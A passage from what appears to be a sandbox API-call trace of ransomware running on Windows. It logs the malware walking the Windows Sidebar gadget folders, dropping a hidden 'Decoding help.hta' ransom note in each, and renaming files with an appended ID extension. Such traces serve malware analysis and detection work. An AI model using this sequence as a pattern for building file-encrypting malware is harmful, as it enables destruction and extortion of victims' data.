Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="cronometer_settings.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png" [0061.498] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png" [0061.498] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.498] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_settings.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_settings.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.498] FindNextFileW (in: hFindFile=0x24558768, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828faeb5, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828faeb5, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2861e485, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x77b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner.png", cAlternateFileName="")) returned 1 [0061.498] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.499] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0061.499] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0061.499] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0x1 [0061.499] lstrcmpiW (lpString1="Decoding help.hta", lpString2="diner.png") returned -1 [0061.499] lstrlenW (lpString="diner.png") returned 9 [0061.499] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.499] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0061.499] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="diner.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png" [0061.499] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png" [0061.499] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.524] FindNextFileW (in: hFindFile=0x24558768, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294716f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8294716f, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2861e485, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb80, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_dot.png", cAlternateFileName="")) returned 1 Thread: id = 989 os_tid = 0xdc8 [0060.272] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*", lpFindFileData=0x2681fd30 | out: lpFindFileData=0x2681fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x245587e8 [0060.273] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.273] FindNextFileW (in: hFindFile=0x245587e8, lpFindFileData=0x2681fd30 | out: lpFindFileData=0x2681fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.273] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.273] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.273] FindNextFileW (in: hFindFile=0x245587e8, lpFindFileData=0x2681fd30 | out: lpFindFileData=0x2681fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0060.273] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0060.273] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0060.273] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0060.273] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" [0060.273] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned 70 [0060.273] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css" [0060.273] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*.*" [0060.273] GlobalMemoryStatus (in: lpBuffer=0x2681fd10 | out: lpBuffer=0x2681fd10) [0060.826] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9641e20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d4 [0064.501] CloseHandle (hObject=0x1d4) returned 1 [0064.501] FindNextFileW (in: hFindFile=0x245587e8, lpFindFileData=0x2681fd30 | out: lpFindFileData=0x2681fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1792, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.html", cAlternateFileName="")) returned 1 Thread: id = 990 os_tid = 0xdd0 [0060.274] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*", lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8063a49c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8063a49c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558868 [0060.277] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.277] FindNextFileW (in: hFindFile=0x24558868, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8063a49c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8063a49c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.277] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.277] FindNextFileW (in: hFindFile=0x24558868, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8640abee, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8640abee, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296c7da5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x3129, dwReserved0=0x0, dwReserved1=0x0, cFileName="activity16v.png", cAlternateFileName="")) returned 1 [0060.277] lstrcpyW (in: lpString1=0x10f14ea8, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0060.277] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0060.277] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0060.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0xffffffff [0060.277] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd3c [0061.503] WriteFile (in: hFile=0xd3c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x26bdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x26bdfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.504] CloseHandle (hObject=0xd3c) returned 1 [0061.504] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.504] lstrcmpiW (lpString1="Decoding help.hta", lpString2="activity16v.png") returned 1 [0061.504] lstrlenW (lpString="activity16v.png") returned 15 [0061.504] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.504] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.504] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="activity16v.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png" [0061.504] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png" [0061.504] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\activity16v.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\activity16v.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.504] FindNextFileW (in: hFindFile=0x24558868, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863263c0, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863263c0, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296c7da5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="add_down.png", cAlternateFileName="")) returned 1 [0061.504] lstrcpyW (in: lpString1=0x10f14ea8, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.504] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.504] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0061.505] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0061.505] lstrcmpiW (lpString1="Decoding help.hta", lpString2="add_down.png") returned 1 [0061.505] lstrlenW (lpString="add_down.png") returned 12 [0061.505] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.505] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="add_down.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png" [0061.505] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png" [0061.505] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\add_down.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\add_down.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.505] FindNextFileW (in: hFindFile=0x24558868, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863263c0, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863263c0, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296edf03, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="add_over.png", cAlternateFileName="")) returned 1 [0061.505] lstrcpyW (in: lpString1=0x10f14ea8, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.505] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0061.505] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0061.505] lstrcmpiW (lpString1="Decoding help.hta", lpString2="add_over.png") returned 1 [0061.505] lstrlenW (lpString="add_over.png") returned 12 [0061.505] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.505] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="add_over.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png" [0061.505] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png" [0061.506] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\add_over.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\add_over.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.506] FindNextFileW (in: hFindFile=0x24558868, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86300263, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x86300263, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296edf03, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="add_up.png", cAlternateFileName="")) returned 1 [0061.506] lstrcpyW (in: lpString1=0x10f14ea8, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.506] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 71 [0061.506] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0061.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0061.506] lstrcmpiW (lpString1="Decoding help.hta", lpString2="add_up.png") returned 1 [0061.506] lstrlenW (lpString="add_up.png") returned 10 [0061.506] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.506] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows 